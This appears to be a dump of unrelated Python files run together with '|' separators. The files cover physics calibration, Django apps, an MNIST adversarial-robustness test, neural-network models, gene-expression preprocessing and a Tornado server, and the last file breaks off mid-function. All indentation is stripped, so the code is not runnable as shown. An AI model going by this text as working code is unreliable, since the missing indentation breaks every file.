run = ''
output = work_folder+'/calib'
indir = replay_folder_me
batch = False
show = 0
gains_file = ''
final = None
method = 'island'
# input parameters
args = sys.argv
#if len(args)<3: sys.exit('no arguments')
for i,a in enumerate(args):
if a in ['-r','-run']: run = args[i+1]
elif a in ['-o','-out']: output = args[i+1] if (args[i+1][0]=='/') else os.getcwd()+'/'+args[i+1]
elif a in ['-i','-in']: indir = args[i+1] if (args[i+1][0]=='/') else os.getcwd()+'/'+args[i+1]
elif a in ['-b','-batch']: batch = True
elif a in ['-s','-show']: show = int(args[i+1])
elif a in ['-f','-final']: final = args[i+1]
elif a in ['-g','-gains']: gains_file = args[i+1] if (args[i+1][0]=='/') else os.getcwd()+'/'+args[i+1]
elif a in ['-m','-method']: method = args[i+1]
###################
## uniting gains ##
###################
if final!=None:
from misc_root import *
# raw gains
runs = sum_dict_lists(runs_list,'calib')
l = [readfile(output+'_'+str(run)+'.txt',[str,float,int]) for run in runs]
l2 = [[l[0][i][0],sum([x[i][1]*x[i][2] for x in l])/sum([x[i][2] for x in l]),sum([x[i][2] for x in l])] if sum([x[i][2] for x in l])!=0 else [l[0][i][0],0.25,0] for i in range(len(l[0]))]
writelist(os.path.dirname(output)+'/gains_calib'+final+'_raw.txt',l2)
sys.stdout.write('raw gains computed\n')
# gaussian gains
if gains_file == '': gains0 = [0.25 for i in range(1728)]
else: gains0 = readfile(gains_file,[float],cols=[1])
f = [TFile(output+'_'+str(run)+'.root') for run in runs]
h = [TH1F('hratio_'+x+'_calib',';E_{cluster}/E_{#gamma};',500,0,2.5) for x in module_names]
l2 = []
for j,x in enumerate(f):
sys.stdout.write(str(runs[j])+'\r')
sys.stdout.flush()
for i,y in enumerate(module_names):
h[i].Add(x.Get(y).Get('hratio_'+y))
for i in range(len(module_names)):
h[i].Fit('gaus','qww','',0.5,2.5)
m = h[i].GetFunction('gaus').GetParameter(1)
g = gains0[i]/m if m!=0. else gains0[i]
s = h[i].GetFunction('gaus').GetParameter(2)/m if m!=0. else h[i].GetFunction('gaus').GetParameter(2)
l2.append([module_names[i],g,s])
writelist(os.path.dirname(output)+'/gains_calib'+final+'_gaus.txt',l2)
sys.stdout.write('gaussian gains computed\n')
# merging trees
c = TChain('hycal','hycal')
for run in runs: c.Add(output+'_'+str(run)+'.root')
c.Merge(os.path.dirname(output)+'/tree_calib'+final+'.root')
sys.stdout.write('merging trees finished\n')
sys.exit()
if run=='': sys.exit('no run mentionned')
################
## batch mode ##
################
if batch:
jsub(project='prad',track='analysis',jobname=os.path.basename(output)+'_'+run,command=os.getcwd()+'/calibrate_calib.py',options='-o '+os.path.basename(output)+' -i . -r '+run+' -g '+gains_file+' -s '+str(show)+' -m '+method,input_files=indir+'/prad_'+run.zfill(6)+'.dst',output_data=os.path.basename(output)+'_'+run+'*',output_template=os.path.dirname(output)+'/@OUTPUT_DATA@',disk_space='10 GB',memory='1024 MB')
print
sys.exit()
##########
## Main ##
##########
# initialisation
from readdst import *
from tagger import *
from hycal import *
from misc_root import *
t = chao(run=int(run),folder=indir)
t.goto(20000)
t.lload = ['','adc','tdc']
if gains_file == '': gains0 = [0.25 for i in range(1728)]
else: gains0 = readfile(gains_file,[float],cols=[1])
ped0 = get_pedestal(t.run)
sigma_ped0 = get_pedestal_sigma(t.run)
lms_gains0 = get_lms_gains(t.run,889,979)
fout = TFile(output+'_'+run+'.root','recreate')
henergy = [TH1F('henergy_'+module_names[i],'',500,0.,1500) for i in range(1728)]
hratio = [TH1F('hratio_'+module_names[i],';E_{cluter}/E_{#gamma};',500,0.,2.5) for i in range(1728)]
hx = [TH1F('hx_'+module_names[i],'',400,-20.,20.) for i in range(1728)]
hy = [TH1F('hy_'+module_names[i],'',400,-20.,20.) for i in range(1728)]
htrigger = [[TH1F('htrigger_'+module_names[i]+'_'+str(j),'',500,0.,1500) for i in range(1728)] for j in range(6)]
l = [('iev','i',''),('trigger','i',''),('E_g','f',''),('xpos','f',''),('ypos','f',''),('n_cl','i',''),('mid','i','[n_cl]'),('E_cl','f','[n_cl]'),('x_cl','f','[n_cl]'),('y_cl','f','[n_cl]'),('chi2_cl','f','[n_cl]'),('nhit_cl','i','[n_cl]'),('nleak_cl','i','[n_cl]'),('nneigh_cl','i','[n_cl]'),('status_cl','i','[n_cl]')]
tree,var = tree_init('hycal',l,nmax=100)
lgain = [0. for i in range(1728)]
ln = [0 for i in range(1728)]
# loop on events
for ev in progress(t,modulo=10000,show=show):
# stability and trigger cuts
if t.isepics: continue
if event_is_bad(ev.iev,t.run): continue
if ev.trigger not in [1,2,5]: continue
# tagger energy
etc = TDCHits([x for x in get_etchannels(ev=ev) if abs(x.t)<25])
if etc==[]: continue
etc = etc.merge()
eg = t.epics['MBSY2C_energy']*etc[0].E
# hycal event
hev = hcevent(ev,2,gains=gains0,peds=ped0,sigma_peds=sigma_ped0,lms_gains=lms_gains0,method=method)
if hev.clusters==[]: continue
# tree filling
xtrans = (t.epics['hallb_ptrans_x_encoder']+652.05)/10.
ytrans = (-(t.epics['hallb_ptrans_y1_encoder']+t.epics['hallb_ptrans_y2_encoder'])/2.-3761.5)/10.
var['iev'][0] = ev.iev
var['trigger'][0] = ev.trigger
var['E_g'][0] = eg
var['xpos'][0] = xtrans
var['ypos'][0] = ytrans
n_cl = 0
# clusters
for cl in hev.clusters:
if cl.E/eg<0.5: continue
htrigger[ev.trigger][cl.mid].Fill(eg)
if cl.E<100 or cl.nhit<3: continue
lgain[cl.mid]+=cl.E/eg
ln[cl.mid]+=1
# tree
var['mid'][n_cl] = cl.mid
var['E_cl'][n_cl] = cl.E
var['x_cl'][n_cl] = cl.x
var['y_cl'][n_cl] = cl.y
var['chi2_cl'][n_cl] = cl.chi2
var['nhit_cl'][n_cl] = len(cl.hits)
var['nleak_cl'][n_cl] = len(cl.leaks)
var['nneigh_cl'][n_cl] = len(cl.leaks)
var['status_cl'][n_cl] = cl.status
n_cl+=1
# histos
if ev.trigger not in [1,2]: continue
henergy[cl.mid].Fill(cl.E,cl.E/eg)
hratio[cl.mid].Fill(cl.E/eg)
hx[cl.mid].Fill(cl.x-xtrans)
hy[cl.mid].Fill(cl.y-ytrans)
var['n_cl'][0] = n_cl
tree.Fill()
# writing gains
gains1 = [z/(x/y) if y!=0 else z for x,y,z in zip(lgain,ln,gains0)]
writelist(output+'_'+run+'.txt',[module_names,gains1,ln],tr=True)
# writing trees and histograms
fout.cd()
tree.Write()
for i in range(1728):
folder = fout.mkdir(module_names[i])
folder.cd()
henergy[i].Write()
hratio[i].Write()
hx[i].Write()
hy[i].Write()
for j in range(6): htrigger[j][i].Write()
fout.Close()
sys.exit(0)
|
from django.db import models
from apex_api.models import User
class UserAmount(models.Model):
user = models.ForeignKey(to=User, on_delete=models.CASCADE)
balance = models.DecimalField(max_digits=19, default="0", decimal_places=2)
def __str__(self):
return f"Hello {self.user} this is your balance {self.balance}"
class Profit(models.Model):
user = models.ForeignKey(to=User, on_delete=models.CASCADE)
percentage_profit_rate = models.CharField(max_length=12)
profit = models.CharField(max_length=100)
def __str__(self):
return f"{self.user} your profit is {self.profit} at the rate of {self.percentage_profit_rate}"
|
# Dan Schellenberg
# Drawing a square of any size
# Note that this program is inefficient. We haven't explored for/while loops yet.
import turtle
the_window = turtle.Screen()
the_background = the_window.textinput("Background Color", "Please enter the background color")
the_window.bgcolor(the_background)
sarah = turtle.Turtle()
turtle_color = the_window.textinput("Turtle Color", "Please enter the color of the turtle")
sarah.color(turtle_color)
pen_width = the_window.numinput("Width", "Please enter the width of the pen")
sarah.pensize(pen_width)
length_of_sides = the_window.numinput("Length", "Please enter the length of each side")
#draw a square!
sarah.forward(length_of_sides)
sarah.left(90)
sarah.forward(length_of_sides)
sarah.left(90)
sarah.forward(length_of_sides)
sarah.left(90)
sarah.forward(length_of_sides)
sarah.left(90)
sarah.hideturtle() |
# Imports
import torch
from torch.autograd import Variable
from models.classes.adjustable_lenet import AdjLeNet
from models.classes.first_layer_unitary_lenet import FstLayUniLeNet
from data_setup import Data
from academy import Academy
from adversarial_attacks import Attacker
import torchvision.transforms.functional as F
import operator
import numpy as np
from prettytable import PrettyTable
# Hyperparameters
gpu = True
save_to_excel = True
set_name = "MNIST"
# Declare which GPU PCI number to use
if gpu == True:
import os
os.environ["CUDA_DEVICE_ORDER"] = "PCI_BUS_ID"
os.environ["CUDA_VISIBLE_DEVICES"] = "1"
# Initialize table
table = PrettyTable()
# Initialize data
data = Data(gpu, set_name)
# Load LeNet
lenet = AdjLeNet(set_name = set_name)
lenet.load_state_dict(torch.load('models/pretrained/classic_lenet_w_acc_98.pt', map_location=torch.device('cpu')))
lenet.eval()
# Generate U
U = torch.nn.init.orthogonal_(torch.empty(784, 784))
# Push to GPU if True
U = U if gpu == False else U.cuda()
# Enter student network and curriculum data into an academy
academy = Academy(lenet, data, gpu)
# Get model accuracy
test_acc = academy.test()
# Create Attacker
attacker = Attacker(net = lenet,
data = data,
gpu = gpu)
# Declare epsilons
epsilons = [x/5 for x in range(81)]
table.add_column("Epsilons", epsilons)
# Get attack accuracies
print("Working on OSSA Attacks...")
ossa_accs = attacker.get_OSSA_attack_accuracy(epsilons = epsilons,
U = None)
ossa_fool_ratio = attacker.get_fool_ratio(test_acc, ossa_accs)
table.add_column("OSSA Attack Accuracy", ossa_fool_ratio)
print("Working on U(eta) Attacks...")
U_eta_accs = attacker.get_OSSA_attack_accuracy(epsilons = epsilons,
U = U)
U_eta_fool_ratio = attacker.get_fool_ratio(test_acc, U_eta_accs)
table.add_column("OSSA (Ueta) Attack Accuracy", U_eta_fool_ratio)
print("Working on FGSM Attacks...")
fgsm_accs = attacker.get_FGSM_attack_accuracy(epsilons = epsilons)
fgsm_fool_ratio = attacker.get_fool_ratio(test_acc, fgsm_accs)
table.add_column("FGSM Attack Accuracy", fgsm_fool_ratio)
# Display
print(table)
# Excel Workbook Object is created
if save_to_excel:
import xlwt
from xlwt import Workbook
# Open Workbook
wb = Workbook()
# Create sheet
sheet = wb.add_sheet('Results')
# Write out each peak and data
results = [epsilons, ossa_fool_ratio, U_eta_fool_ratio, fgsm_fool_ratio]
names = ["epsilons", "ossa_fool_ratio", "U_eta_fool_ratio", "fgsm_fool_ratio"]
for i, result in enumerate(results):
sheet.write(0, i, names[i])
for j, value in enumerate(result):
sheet.write(j + 1, i, value)
wb.save('results.xls')
|
from skimage.feature import daisy
from skimage import data
import matplotlib.pyplot as plt
import csv
import imquality.brisque as brisque
import PIL.Image
import os
from os.path import expanduser
import numpy as np
import sys
from skimage.transform import rescale, resize, downscale_local_mean
from blob_detection import blobdetection
from orb import orb
home = expanduser("~")
clear_dir = home + "/Downloads/QA-Polyp/train/0-clear/";
blur_dir = home + "/Downloads/QA-Polyp/train/1-blurry/"
clear_images = os.listdir(clear_dir)
blur_images = os.listdir(blur_dir)
LOOP = 4
for i in range(LOOP):
try:
path = clear_dir+clear_images[i]
#print(path+" Features :"+str(blobdetection(path)))
print(path+" Features :"+str(orb(path)))
path = blur_dir+blur_images[i]
#print(path + " Features :" + str(blobdetection(path)))
print(path+" Features :"+str(orb(path)))
except:
print("error occurred :", sys.exc_info()[1])
|
from dynamic_rest.viewsets import DynamicModelViewSet
from .models import Parent, Child
from .serializers import ParentSerializer, ChildSerializer
class ChildViewSet(DynamicModelViewSet):
queryset = Child.objects
serializer_class = ChildSerializer
class ParentViewSet(DynamicModelViewSet):
queryset = Parent.objects
serializer_class = ParentSerializer
|
def solution(h):
answer = []
h.reverse()
while h:
tmp = h.pop(0)
flag = len(h)
for i in h:#reversed(h):
if i > tmp:
break
flag-=1
# answer.insert(0,flag)
answer.append(flag)
answer.reverse()
return answer |
import tensorflow as tf
import utility
@utility.multi_input_model
@utility.named_model
def cnn_multi_input_v2_basic():
def get_submodel():
input_ts = tf.keras.layers.Input(shape=(20, 1))
temp1 = tf.keras.layers.Convolution1D(8, 3, activation="relu")(input_ts)
temp1 = tf.keras.layers.MaxPooling1D(2)(temp1)
temp1 = tf.keras.layers.Convolution1D(16, 3, activation="relu")(temp1)
temp1 = tf.keras.layers.MaxPooling1D(2)(temp1)
output_ts = tf.keras.layers.Flatten()(temp1)
return input_ts, output_ts
inp_list = []
opt_list = []
for _ in range(5):
inp, opt = get_submodel()
inp_list.append(inp)
opt_list.append(opt)
temp2 = tf.concat(opt_list, axis=1)
temp2 = tf.keras.layers.Dropout(0.5)(temp2)
temp2 = tf.keras.layers.Dense(32, activation="relu")(temp2)
temp2 = tf.keras.layers.Dense(8, activation="relu")(temp2)
output_final = tf.keras.layers.Dense(1, activation="tanh")(temp2)
model = tf.keras.Model(inputs=inp_list, outputs=output_final)
model.compile(optimizer='Adam',
loss='mae',
metrics=['mae', 'mse'])
return model
@utility.multi_input_model
@utility.named_model
def cnn_multi_input_v2_deep():
def get_submodel():
input_ts = tf.keras.layers.Input(shape=(20, 1))
temp1 = tf.keras.layers.Convolution1D(8, 3)(input_ts)
temp1 = tf.keras.layers.BatchNormalization(axis=1)(temp1)
temp1 = tf.keras.layers.LeakyReLU()(temp1)
temp1 = tf.keras.layers.Convolution1D(8, 3)(temp1)
temp1 = tf.keras.layers.BatchNormalization(axis=1)(temp1)
temp1 = tf.keras.layers.LeakyReLU()(temp1)
temp1 = tf.keras.layers.Convolution1D(8, 3)(temp1)
temp1 = tf.keras.layers.BatchNormalization(axis=1)(temp1)
temp1 = tf.keras.layers.LeakyReLU()(temp1)
temp1 = tf.keras.layers.Convolution1D(8, 3)(temp1)
temp1 = tf.keras.layers.BatchNormalization(axis=1)(temp1)
temp1 = tf.keras.layers.LeakyReLU()(temp1)
temp1 = tf.keras.layers.Convolution1D(8, 3)(temp1)
temp1 = tf.keras.layers.BatchNormalization(axis=1)(temp1)
temp1 = tf.keras.layers.LeakyReLU()(temp1)
output_ts = tf.keras.layers.Flatten()(temp1)
return input_ts, output_ts
inp_list = []
opt_list = []
for _ in range(5):
inp, opt = get_submodel()
inp_list.append(inp)
opt_list.append(opt)
temp2 = tf.concat(opt_list, axis=1)
temp2 = tf.keras.layers.Dense(32, activation="relu")(temp2)
temp2 = tf.keras.layers.Dropout(0.5)(temp2)
temp2 = tf.keras.layers.Dense(8, activation="relu")(temp2)
output_final = tf.keras.layers.Dense(1, activation="tanh")(temp2)
model = tf.keras.Model(inputs=inp_list, outputs=output_final)
model.compile(optimizer='Adam',
loss='mae',
metrics=['mae', 'mse'])
return model
@utility.multi_input_model
@utility.named_model
def lstm_multi_input_v2_basic():
def get_submodel():
input_ts = tf.keras.layers.Input(shape=(20, 1))
temp1 = tf.keras.layers.LSTM(5, input_shape=(20, 1))(input_ts)
output_ts = tf.keras.layers.Flatten()(temp1)
return input_ts, output_ts
inp_list = []
opt_list = []
for _ in range(5):
inp, opt = get_submodel()
inp_list.append(inp)
opt_list.append(opt)
temp2 = tf.concat(opt_list, axis=1)
temp2 = tf.keras.layers.Dense(16, activation="relu")(temp2)
output_final = tf.keras.layers.Dense(1, activation="tanh")(temp2)
model = tf.keras.Model(inputs=inp_list, outputs=output_final)
model.compile(optimizer='Adam',
loss='mae',
metrics=['mae', 'mse'])
return model
@utility.multi_input_model
@utility.named_model
def lstm_multi_input_v2_stack4():
def get_submodel():
input_ts = tf.keras.layers.Input(shape=(20, 1))
temp1 = tf.keras.layers.LSTM(5, input_shape=(20, 1), return_sequences=True)(input_ts)
temp1 = tf.keras.layers.LSTM(5, input_shape=(20, 1), return_sequences=True)(temp1)
temp1 = tf.keras.layers.LSTM(5, input_shape=(20, 1), return_sequences=True)(temp1)
temp1 = tf.keras.layers.LSTM(5, input_shape=(20, 1))(temp1)
output_ts = tf.keras.layers.Flatten()(temp1)
return input_ts, output_ts
inp_list = []
opt_list = []
for _ in range(5):
inp, opt = get_submodel()
inp_list.append(inp)
opt_list.append(opt)
temp2 = tf.concat(opt_list, axis=1)
temp2 = tf.keras.layers.Dense(16, activation="relu")(temp2)
output_final = tf.keras.layers.Dense(1, activation="tanh")(temp2)
model = tf.keras.Model(inputs=inp_list, outputs=output_final)
model.compile(optimizer='Adam',
loss='mae',
metrics=['mae', 'mse'])
return model
test_iteration1 = [cnn_multi_input_v2_basic,
cnn_multi_input_v2_deep,
lstm_multi_input_v2_basic,
lstm_multi_input_v2_stack4]
|
from django.urls import path
from . import views
urlpatterns= [
path('', views.home, name='home'),
path('settings/', views.SettingsView.as_view(), name='settings'),
path('skills/', views.SkillListview.as_view(), name='skill-list'),
path('skills/create', views.SkillCreateView.as_view(), name='skill-create'),
path('skills/update/<int:pk>', views.SkillUpdateView.as_view(), name='skill-update'),
path('skills/delete/<int:pk>', views.SkillDeleteView.as_view(), name='skill-delete'),
path('interests/', views.InterestListview.as_view(), name='interest-list'),
path('interests/create', views.InterestCreateView.as_view(), name='interest-create'),
path('interests/update/<int:pk>', views.InterestUpdateView.as_view(), name='interest-update'),
path('interests/delete/<int:pk>', views.InterestDeleteView.as_view(), name='interest-delete'),
path('educations/', views.EducationListview.as_view(), name='education-list'),
path('educations/create', views.EducationCreateView.as_view(), name='education-create'),
path('educations/update/<int:pk>', views.EducationUpdateView.as_view(), name='education-update'),
path('educations/delete/<int:pk>', views.EducationDeleteView.as_view(), name='education-delete'),
path('badges/', views.BadgeListview.as_view(), name='badge-list'),
path('badges/create', views.BadgeCreateView.as_view(), name='badge-create'),
path('badges/update/<int:pk>', views.BadgeUpdateView.as_view(), name='badge-update'),
path('badges/delete/<int:pk>', views.BadgeDeleteView.as_view(), name='badge-delete'),
path('<slug:username>/', views.WebsiteView.as_view(), name='website'),
] |
# Problem #58 [Medium]
# An sorted array of integers was rotated an unknown number of times.
#
# Given such an array, find the index of the element in the array in faster than linear time.
# If the element doesn't exist in the array, return null.
#
# For example, given the array [13, 18, 25, 2, 8, 10] and the element 8, return 4 (the index of 8 in the array).
#
# You can assume all the integers in the array are unique.
def find_index(array, element, start=0, end=None):
if end is None:
end = len(array) - 1
# the element is not in the array
if start > end:
return None
# check if the array middle is the element
middle = (start + end) // 2
if array[middle] == element:
return middle
# the numbers in the first part are sorted
if array[start] <= array[middle]:
# and the element is in the first part
if array[start] <= element <= array[middle]:
# look for the element in the first part
return find_index(array, element, start, middle-1)
# look for the element in the second part
return find_index(array, element, middle+1, end)
# the numbers in the second part are sorted
else:
# and the element is in the second part
if array[middle] <= element <= array[end]:
# look for the element in the second part
return find_index(array, element, middle+1, end)
# look for the element in the first part
return find_index(array, element, start, middle-1)
array = [13, 18, 25, 2, 8, 10]
for index in range(len(array)):
assert find_index(array, array[index]) == index
assert find_index(array, 15) is None
assert find_index(array, 22) is None
assert find_index(array, 5) is None
assert find_index(array, 11) is None
# the problem seemed easy, i knew i have to use binary search and i need the first element and the middle to see with
# part of the array i need to check. I tried for a long time, maybe around 2 hours to do a recursive solution that keep
# getting the subarray that the element is in, but for some reason i couldnt got it right what part of the array to
# choose. Went online to find this solution of not getting the subarray itself, but passing the index of the subarray
|
#coding: utf-8
import random,sys,math
import logging
from config import *
__all__ = ['generate']
def exponential (mean):
return (-mean * math.log(random.random()))
def getPacketSize (averagePacketSize):
packetSize = int(exponential(averagePacketSize))
while (packetSize < MIN_PACKET_SIZE) or (packetSize > MAX_PACKET_SIZE):
packetSize = int(exponential(averagePacketSize))
return packetSize
def getArrivalTime(arrivalRate,averagePacketSize):
return exponential(( averagePacketSize * 8)/arrivalRate)
def generate(filename,simulationTime, arrivalRate, averagePacketSize):
try:
with open(filename,'w') as file_in:
time = 0.0
while time <= simulationTime:
time += getArrivalTime(arrivalRate,averagePacketSize)
packetSize = getPacketSize(averagePacketSize)
file_in.write("%s \t %s\n" % (time,packetSize))
except IOError as ioerr:
logging.exception('File creation error: IOError: '+str(ioerr))
|
""""
作者:jx
日期:2018-11-1
版本:1
文件名:data_process.py
功能:对striatum、cortex、liver三个组织的数据分别进行预处理
"""
import os
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
from sklearn.preprocessing import MinMaxScaler
def pre_select_gene(str_2m_df, str_6m_df, str_10m_df, N):
"""
预处理基因表达数据
1.删除在所有样本中表达值全为0的基因
2.对基因表达数据进行归一化处理
3.计算每个基因在所有样本中的均值和方差,并按从大到小进行排序
4.根据Rank-product选择高排名的5000个基因做下一步排序
:param str_2m_df:
:param str_6m_df:
:param str_10m_df:
:param N
:return: pre_select_gene
"""
# 预处理基因表达数据
#==============Step 1. 将三个时间段的样本合并,删除在所有样本中表达值全为0的基因==============
str_2m_Oridata_matrix = str_2m_df.as_matrix()
str_6m_Oridata_matrix = str_6m_df.as_matrix()
str_10m_Oridata_matrix = str_10m_df.as_matrix()
gename = str_2m_Oridata_matrix[:, 0]
str_2m_data_matrix = str_2m_Oridata_matrix[:, 1:]
str_6m_data_matrix = str_6m_Oridata_matrix[:, 1:]
str_10m_data_matrix = str_10m_Oridata_matrix[:, 1:]
#将三个时间阶段的数据合并到一个矩阵中
gene_express_matrix = np.hstack((str_2m_data_matrix, str_6m_data_matrix))
gene_express_matrix = np.hstack((gene_express_matrix, str_10m_data_matrix))
#删除在所有样本中表达值全为0的基因,即均值为0
proc1_gene_express_list = []
proc1_gename = []
for i in range(len(gename)):
if sum(gene_express_matrix[i,:]) != 0:
proc1_gene_express_list.append(gene_express_matrix[i, :])
proc1_gename.append(gename[i])
print('Total gene number:', len(gename))
print('The selected gene number after filtering out 0', len(proc1_gename))
#===============Step 2. 计算每一个基因在所有样本中的方差和均值,并按从大到小进行排序=============
proc2_gene_express_matrix = np.array(proc1_gene_express_list)
proc_gene_express_var = []
proc_gene_express_mean = []
#对每一列数据进行归一化处理
scaler = MinMaxScaler()
gene_express_scaled = scaler.fit_transform(proc2_gene_express_matrix)
#计算每个基因在不同样本下的方差,并按方差从大到小进行排名
for i in range(len(proc1_gename)):
proc_gene_express_var.append(gene_express_scaled[i, :].var())
proc_gene_express_mean.append(gene_express_scaled[i, :].mean())
#将list格式转化为数组格式,进而进行排序
proc2_var = np.array(proc_gene_express_var)
proc2_mean = np.array(proc_gene_express_mean)
#按从大到小进行排序,并记录排名对应的索引
#proc2_sort = abs(np.sort(-proc2_var))
#proc2_mean = abs(np.sort(-proc2_mean))
proc2_var_sort_index = np.argsort(-proc2_var)
proc2_mean_sort_index = np.argsort(-proc2_mean)
print(proc2_var_sort_index)
print(proc2_mean_sort_index)
#计算综合排名
Rank_Product = []
for i in range(len(proc1_gename)):
a = proc2_var_sort_index[i]
b = proc2_mean_sort_index[i]
c = a * b
Rank_Product.append(c)
Rank_Product_sort_index = np.argsort(Rank_Product)
# 作图,画出归一化后的所有基因的方差和均值变化的曲线图
#plt.figure(1)
#plt.plot(proc_var_sort[500:])
#plt.xlabel('Ranking')
#plt.ylabel('Variance')
#plt.title('Variances of scaled gene expression')
#plt.grid(True)
#plt.show()
#plt.figure(2)
#plt.plot(proc_mean_sort[500:])
#plt.xlabel('Ranking')
#plt.ylabel('Mean')
#plt.title('Means of scaled gene expression')
#plt.grid(True)
#plt.show()
#===============Step 3. 筛选高排名的基因 ================
#筛选排名前N的基因,并提取这些基因在各个时间点下的基因表达数据
proc1_gename = np.array(proc1_gename)
proc2_gename = []
for i in range(len(proc1_gename)):
if Rank_Product_sort_index[i] < N:
proc2_gename.append(proc1_gename[i])
pre_select_gename = np.array(proc2_gename)
return pre_select_gename
def union_gene_list(gene_list1, gene_list2):
"""
整合两个基因列表中的基因
:return: gene_list 整合的基因列表
"""
gene_list = []
for i in range(len(gene_list1)):
if gene_list1[i] not in gene_list2:
gene_list.append(gene_list1[i])
for i in range(len(gene_list2)):
gene_list.append(gene_list2[i])
print('基因列表长度为:', len(gene_list))
return gene_list
def overlap_gene(gene_list1, gene_list2):
"""
统计两个基因集合中包含了多少疾病相关基因,多少非疾病相关基因
:param gene_list1:
:param gene_list2:
:return: 重合的基因
"""
overlap_gene = [l for l in gene_list1 if l in gene_list2]
print('重合基因个数:', len(overlap_gene))
return overlap_gene
def get_gene_express(gene_name, str_2m_df, str_6m_df, str_10m_df):
"""
提取出gene_name的基因表达数据
:param gene_name:
:param str_2m_df, str_6m_df, str_10m_df:
:return: str_2m_select_gene_express, str_6m_select_gene_express, str_10m_select_gene_express
"""
str_2m_matrix = str_2m_df.as_matrix()
str_6m_matrix = str_6m_df.as_matrix()
str_10m_matrix = str_10m_df.as_matrix()
str_2m_select_gexpress = []
str_6m_select_gexpress = []
str_10m_select_gexpress = []
for i in range(len(gene_name)):
for j in range(len(str_2m_matrix)):
if gene_name[i] == str_2m_matrix[j, 0]:
str_2m_select_gexpress.append(str_2m_matrix[j, :])
str_6m_select_gexpress.append(str_6m_matrix[j, :])
str_10m_select_gexpress.append(str_10m_matrix[j, :])
break
return str_2m_select_gexpress, str_6m_select_gexpress, str_10m_select_gexpress
def main():
"""
主函数
"""
# ========= Step 1. 读入数据,预筛选各组织基因 ===========
#读入striatum组织的数据,为数据框格式
striatum_2m_df = pd.read_csv('./data/hdinhd/Striatum/striatum_2m_FPKM.csv')
striatum_6m_df = pd.read_csv('./data/hdinhd/Striatum/striatum_6m_FPKM.csv')
striatum_10m_df = pd.read_csv('./data/hdinhd/Striatum/striatum_10m_FPKM.csv')
#对Striatum组织的数据初步预筛选基因
str_gename = pre_select_gene(striatum_2m_df, striatum_6m_df, striatum_10m_df, 5000)
# ===== Step 2. 统计预筛选出的基因与训练集基因的交集,并将训练集中的基因加入整合基因列表=======
#读入训练集中的疾病相关基因,并将其添加进入数据
hit_gene_df = pd.read_csv('./data/trainhital.csv')
hit_gene = hit_gene_df.as_matrix()
hit_gename = hit_gene[:, 0]
nohit_gene_df = pd.read_csv('./data/trainnohital.csv')
nohit_gene = nohit_gene_df.as_matrix()
nohit_gename = nohit_gene[:, 0]
overlap_gene(str_gename, hit_gename)
overlap_gene(str_gename, nohit_gename)
train = union_gene_list(hit_gename, nohit_gename)
final_gene_list = union_gene_list(str_gename, train)
#========Step 3.根据最终基因列表,提取各组织基因表达数据并保存=========
str_2m_gene_express, str_6m_gene_express, str_10m_gene_express = get_gene_express(final_gene_list, striatum_2m_df, striatum_6m_df, striatum_10m_df)
# =======Step 4. 保存文件============
# 将Numpy.array格式转化为pandas.dataframe格式
final_gene_list_df = pd.DataFrame(data = final_gene_list)
str_2m_gene_express_df = pd.DataFrame(data = str_2m_gene_express)
str_6m_gene_express_df = pd.DataFrame(data = str_6m_gene_express)
str_10m_gene_express_df = pd.DataFrame(data = str_10m_gene_express)
# 对文件进行输出
final_gene_list_df.to_csv('./output/pre_genename.csv')
str_2m_gene_express_df.to_csv('./output/str_2m_gene_express.csv')
str_6m_gene_express_df.to_csv('./output/str_6m_gene_express.csv')
str_10m_gene_express_df.to_csv('./output/str_10m_gene_express.csv')
if __name__ == '__main__':
main() |
# encoding: utf-8
import argparse
import json
import os
import traceback
import tornado.ioloop
import tornado.web
import mrep.builder as builder
import mrep.morph as morph
import mrep.pattern as pattern
class Database(object):
def __init__(self, sentences):
parser = morph.MeCabParser()
data = []
for s in sentences:
data.append({
'original': s,
'morphemes': parser.parse(s),
})
self.data = data
def find(self, pat):
matcher = builder.parse(pat.encode('utf-8'))
results = []
for datum in self.data:
ms = datum['morphemes']
result = pattern.find(ms, matcher)
if len(result) > 0:
results.append({
'original': datum['original'],
'result': result
})
return results
class TopHandler(tornado.web.RequestHandler):
def initialize(self, db):
self.db = db
def get(self):
self.render('find.html',
results=None,
pat='',
error=None,
trace=None)
class FindHandler(tornado.web.RequestHandler):
def initialize(self, db):
self.db = db
def get(self):
pat = self.get_argument('pat')
try:
results = self.db.find(pat)
self.render('find.html',
results=results,
pat=pat,
error=None)
except Exception as e:
self.render('find.html',
results=None,
pat=pat,
error=e,
trace=traceback.format_exc())
def run():
parser = argparse.ArgumentParser(
description='MREP server: morpheme regular expression printer')
parser.add_argument('file', metavar='FILE',
help='data file')
parser.add_argument('-p', '--port', type=int, required=False, default=8080,
help='port number')
args = parser.parse_args()
root = os.path.dirname(os.path.abspath(__file__))
sentences = []
with open(args.file) as f:
for line in f:
sentences.append(line.strip())
db = Database(sentences)
prop = {'db': db}
handlers = [
(r'/', TopHandler, prop),
(r'/find', FindHandler, prop)
]
application = tornado.web.Application(
handlers,
static_path=os.path.join(root, 'static'),
template_path=os.path.join(root, 'template'),
debug=True)
application.listen(args.port)
print('The server is running on port %d' % args.port)
print('Type <Ctrl-C> to stop the server')
tornado.ioloop.IOLoop.instance().start()
|
from util import merge_dict, ComparableMixin
import pandas as pd
import numpy as np
import queue
import math
import random
# Random Encoding
def create_encoding_random(unique_classes):
"""
:param unique_classes: container with the unique classes
:return: a dictionary having the classes as key and binary codes as values,
a dictionary having binary codes as key and class as value
the length of the encoding strings
"""
encoding_length = int(math.log(len(unique_classes), 2))
if 2**encoding_length != len(unique_classes):
encoding_length += 1
dict_class_code = {}
dict_code_class = {}
for user in unique_classes:
code = ''.join(random.choices(['0', '1'], k=encoding_length))
while code in dict_code_class:
code = ''.join(random.choices(['0', '1'], k=encoding_length))
dict_class_code[user] = code
dict_code_class[code] = user
return dict_class_code, dict_code_class, encoding_length
# Basic BinaryNode Structure
class BinaryNode(ComparableMixin):
def __init__(self, left_node=None, right_node=None, level=0):
self.right_node = right_node
self.left_node = left_node
self.level = level
self.code = ''
def assign_code(self, code):
self.code = code + self.level * '0'
def change_level(self, level):
self.level = level
def _cmpkey(self):
return self.value
class HuffmanBinaryNode(BinaryNode):
def __init__(self, value, left_node=None, right_node=None, level=0):
BinaryNode.__init__(self, left_node, right_node, level)
self.value = value
def encode_classes(node, code, level, value_attr, unique_values):
"""
Encode all the children nodes of the current node, builds two dictionaries that keep the encoding
:param node: the node of the tree beginning with each to encode
:param code: the code to be assigned to the node
:param level: the level to be assigned to the node
:param value_attr: the attribute of the node that designates the value
